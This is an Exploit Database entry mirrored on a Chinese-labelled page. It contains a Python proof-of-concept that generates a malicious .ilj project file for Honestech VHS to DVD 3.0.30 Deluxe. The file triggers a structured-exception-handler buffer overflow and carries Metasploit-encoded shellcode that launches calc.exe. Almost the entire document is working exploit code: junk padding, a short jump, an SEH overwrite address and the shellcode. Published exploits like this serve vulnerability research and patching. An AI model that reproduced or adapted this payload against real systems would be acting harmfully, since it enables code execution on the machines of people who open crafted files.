Honestech VHS to DVD 3.0.30 Deluxe – Local Buffer Overflow (SEH)

• Exploit Database
• 14 阅读

• 作者： Brennon Thomas
  日期： 2010-09-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15022/

• #!/usr/bin/python
  #
  # Exploit Title: Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
  # Date: September 16, 2010
  # Author: Brennon Thomas thomab310@gmail.com
  # Software Link: n/a
  # Version: <= 3.0.30.0 Deluxe
  # Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0
  #
  # Usage: This python script generates the malicious .ilj project file. 
  # Open Honestech VHS to DVD <= 3.0.30 Deluxe in Advanced mode and
  # load the corrupt file.
  #
  # Exploit is for education purposes only.Author takes no responsibility
  # for what you do with it. 
  
  #Required file text
  buf = "\r\n\
  \r\n\
  <CAPTURE>\r\n\
  \r\n\
  [MAINDLG]\r\n\
  PAGE=0\r\n\
  \r\n\
  [AVICODEC]\r\n\
  VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)\r\n\
  AUDIOCODEC=MPEG Layer-3\r\n\
  \r\n\
  [WMVINFO]\r\n\
  TITLE=\r\n\
  AUTHOR=\r\n\
  COPYRIGHT=\r\n\
  DESCRIPTION=\r\n\
  \r\n\
  [CAPTUREINFO]\r\n\
  OUTPUTFOLDER=E:\\misc\\\r\n\
  STATE=0,1,1,0,4396,4,1,0,0\r\n\
  \r\n\
  [BURNINFO]\r\n\
  STATE=0,0,0,0,0,0\r\n\
  TEMPFOLDER=E:\\misc\\\r\n\
  VIDEOTSFOLDER=E:\\misc\\\r\n\
  IMAGEFOLDER=E:\\misc\\\r\n\
  \r\n\
  [FILELIST]\r\n\
  FILE=E:\\"
  
  buf += "\x90"*257 #Junk
  buf += "\xeb\x08\x90\x90" #JMP SHORT 8, NOP Padding
  buf += "\xba\x25\x31\x58" #SEH Overwrite to POP,POP,RETN in msg723.acm
  buf += "\x90"*16#NOP Buffer
  
  #msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x2c' -t c
  #[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
  buf += ("\xbe\xf9\x89\xfa\xaa\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
  "\x5d\x31\x75\x13\x83\xed\xfc\x03\x75\xf6\x6b\x0f\x56\xe0\xe5"
  "\xf0\xa7\xf0\x95\x79\x42\xc1\x87\x1e\x06\x73\x18\x54\x4a\x7f"
  "\xd3\x38\x7f\xf4\x91\x94\x70\xbd\x1c\xc3\xbf\x3e\x91\xcb\x6c"
  "\xfc\xb3\xb7\x6e\xd0\x13\x89\xa0\x25\x55\xce\xdd\xc5\x07\x87"
  "\xaa\x77\xb8\xac\xef\x4b\xb9\x62\x64\xf3\xc1\x07\xbb\x87\x7b"
  "\x09\xec\x37\xf7\x41\x14\x3c\x5f\x72\x25\x91\x83\x4e\x6c\x9e"
  "\x70\x24\x6f\x76\x49\xc5\x41\xb6\x06\xf8\x6d\x3b\x56\x3c\x49"
  "\xa3\x2d\x36\xa9\x5e\x36\x8d\xd3\x84\xb3\x10\x73\x4f\x63\xf1"
  "\x85\x9c\xf2\x72\x89\x69\x70\xdc\x8e\x6c\x55\x56\xaa\xe5\x58"
  "\xb9\x3a\xbd\x7e\x1d\x66\x66\x1e\x04\xc2\xc9\x1f\x56\xaa\xb6"
  "\x85\x1c\x59\xa3\xbc\x7e\x34\x32\x4c\x05\x71\x34\x4e\x06\xd2"
  "\x5c\x7f\x8d\xbd\x1b\x80\x44\xfa\xd3\xca\xc5\xab\x7b\x93\x9f"
  "\xe9\xe6\x24\x4a\x2d\x1e\xa7\x7f\xce\xe5\xb7\xf5\xcb\xa2\x7f"
  "\xe5\xa1\xbb\x15\x09\x15\xbc\x3f\x6a\xf8\x2e\xa3\x43\x9f\xd6"
  "\x46\x9c\x55")
  
  buf += "\x90"*(6000-(len(buf))) #NOP Buffer
  buf += ",0,7462,885953024,4,1,640,480\r\n" #Required file text
  
  f = open("sploit.ilj", "w")
  f.write(buf)
  f.close()